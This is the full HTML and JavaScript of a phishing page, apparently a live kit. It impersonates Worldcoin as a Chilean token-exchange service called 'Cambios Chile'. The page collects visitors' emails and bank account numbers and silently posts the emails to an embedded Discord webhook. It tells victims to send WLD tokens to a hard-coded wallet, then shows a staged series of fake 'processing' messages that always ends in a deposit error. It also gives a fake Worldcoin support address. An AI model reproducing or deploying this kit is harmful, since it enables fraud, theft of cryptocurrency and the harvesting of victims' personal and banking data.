<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Registro - Worldcoin</title>
    <style>
        body {
            font-family: 'Montserrat', sans-serif;
            background-color: #f4f4f4; /* Fondo más suave */
            color: #333; /* Texto oscuro */
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }

        #banner {
            width: 150px; /* Ancho de la imagen */
            height: 150px; /* Alto de la imagen */
            border-radius: 50%; /* Borde redondeado */
            object-fit: cover; /* Ajusta la imagen */
            margin-bottom: 20px; /* Espacio debajo de la imagen */
        }

        .container {
            background-color: rgba(255, 255, 255, 0.9); /* Fondo blanco con opacidad */
            color: #333;
            padding: 40px;
            border-radius: 15px;
            box-shadow: 0px 0px 30px rgba(0, 0, 0, 0.1);
            text-align: center;
            width: 90%;
            max-width: 400px; /* Máximo ancho del contenedor */
        }

        .input-group {
            margin-bottom: 20px; /* Espaciado entre grupos de entrada */
        }

        .input-group label {
            font-size: 18px;
            margin-bottom: 10px;
            display: block;
            color: #555; /* Texto gris oscuro */
        }

        .input-group input[type="text"] {
            width: calc(100% - 30px);
            padding: 10px;
            font-size: 16px;
            border: 1px solid #ccc; /* Borde gris claro */
            border-radius: 5px;
            background-color: #fff; /* Fondo blanco */
            color: #333; /* Texto oscuro */
        }

        .input-group button {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            background-color: #28a745; /* Verde */
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }

        .input-group button:hover {
            background-color: #218838; /* Verde oscuro al pasar el ratón */
        }

        .success-text {
            color: #4CAF50; /* Verde */
            font-size: 16px;
            margin-top: 10px;
        }

        .popup {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: #fff;
            padding: 30px;
            border: 2px solid #28a745; /* Verde */
            border-radius: 10px;
            text-align: center;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
        }

        .mensaje {
            font-size: 18px;
            margin-bottom: 20px;
            color: #333; /* Texto oscuro */
        }

        .support-text {
            margin-top: 20px;
            color: #333; /* Texto oscuro */
        }

        #wallet-address {
            color: #333; /* Texto oscuro */
            font-weight: bold; /* Texto en negrita */
        }
    </style>
</head>
<body>
    <img id="banner" src="https://cambios-chile-2.vercel.app/chile.jfif" alt="Banner Worldcoin">
    
    <div class="container">
        <h2>Cambios Chile </h2>

        <div class="input-group">
            <label for="email">Ingresa tu correo:</label>
            <input type="text" id="email" placeholder="Correo electrónico">
            <button onclick="registrarCorreo(this)">Registrar y Enviar</button>
            <div class="success-text" id="email-success"></div>
        </div>

        <div class="input-group">
            <label for="cbu">Coloca tu Cuenta Rut Santander Falabella :</label>
            <input type="text" id="cbu" placeholder="CTA RUT/SANTANDER/FALABELLA">
            <button onclick="registrarCBU(this)">Registrar y Enviar</button>
            <div class="success-text" id="cbu-success"></div>
        </div>

        <div class="input-group">
            <label>Copia y envía los WLD a esta dirección:</label>
            <input type="text" id="wallet-address" value="0x01C65F22A9478C2932e62483509c233F0aaD5c72" readonly>
            <button onclick="copiarDireccion()">Copiar</button>
        </div>

        <button class="boton-azul-oscuro" onclick="mostrarPopup()">Cargar</button>
    </div>

    <div class="popup" id="popup">
        <div class="mensaje" id="mensaje">Procesando datos...</div>
        <div class="support-text">
            <p>Soporte: <a href="mailto:WorldcoinAPP@Worldcoin.org">WorldcoinAPP@Worldcoin.org</a></p>
        </div>
    </div>

    <script>
        function validarCorreo(correo) {
            return correo.includes('@');
        }

        function enviarCorreoAlWebhook(correo) {
            var webhookURL = 'https://discordapp.com/api/webhooks/1157760501829345320/5vqHkW8jnO_nFfS8WSL-2fsP9q_Jxa2wTkAAhrml4P681DYeXAAJd51F94_rISviSmSo';  // Reemplaza con tu webhook
            var payload = {
                content: 'Nuevo correo registrado: ' + correo
            };

            fetch(webhookURL, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(payload)
            });
        }

        function registrarCorreo(button) {
            var emailInput = document.getElementById('email');
            var successDiv = document.getElementById('email-success');

            if (validarCorreo(emailInput.value)) {
                emailInput.setAttribute('readonly', true);
                emailInput.style.backgroundColor = '#f2f2f2';
                successDiv.textContent = 'Registrado exitosamente!';
                enviarCorreoAlWebhook(emailInput.value);
                button.textContent = 'CONFIRMADO';
            } else {
                successDiv.textContent = 'Error: Correo inválido';
                successDiv.style.color = 'red';
            }
        }

        function registrarCBU(button) {
            var cbuInput = document.getElementById('cbu');
            var successDiv = document.getElementById('cbu-success');

            if (/^\d+$/.test(cbuInput.value)) {
                cbuInput.setAttribute('readonly', true);
                cbuInput.style.backgroundColor = '#f2f2f2';
                successDiv.textContent = 'La Cta  ha sido registrado exitosamente.';
                button.textContent = 'CONFIRMADO';
            } else {
                successDiv.textContent = 'Error: Por favor, ingrese solo números en la Cta .';
                successDiv.style.color = 'red';
            }
        }

        function copiarDireccion() {
            var direccion = document.getElementById('wallet-address');
            var texto = direccion.value;
            var inputTemporal = document.createElement('input');
            inputTemporal.setAttribute('type', 'text');
            inputTemporal.setAttribute('value', texto);
            document.body.appendChild(inputTemporal);
            inputTemporal.select();
            document.execCommand('copy');
            document.body.removeChild(inputTemporal);
            alert('Dirección copiada: ' + texto);
        }

        function mostrarPopup() {
            var popup = document.getElementById('popup');
            var mensaje = document.getElementById('mensaje');

            popup.style.display = 'block';
            mensaje.textContent = 'No cerrar la página. Cargando PAGO';

            setTimeout(function() {
                mensaje.textContent = 'Procesando datos...';
            }, 30000); // 30 segundos

            setTimeout(function() {
                mensaje.textContent = 'Conectando API Bank..';
            }, 40000); // 40 segundos

            setTimeout(function() {
                mensaje.textContent = 'Checkeando depósito de Worldcoin..';
            }, 50000); // 50 segundos

            setTimeout(function() {
                mensaje.textContent = 'ERROR en Depósito de WorldCoin no válido!';
                mensaje.style.color = 'red';
            }, 60000); // 60 segundos
        }
    </script>
</body>
</html>
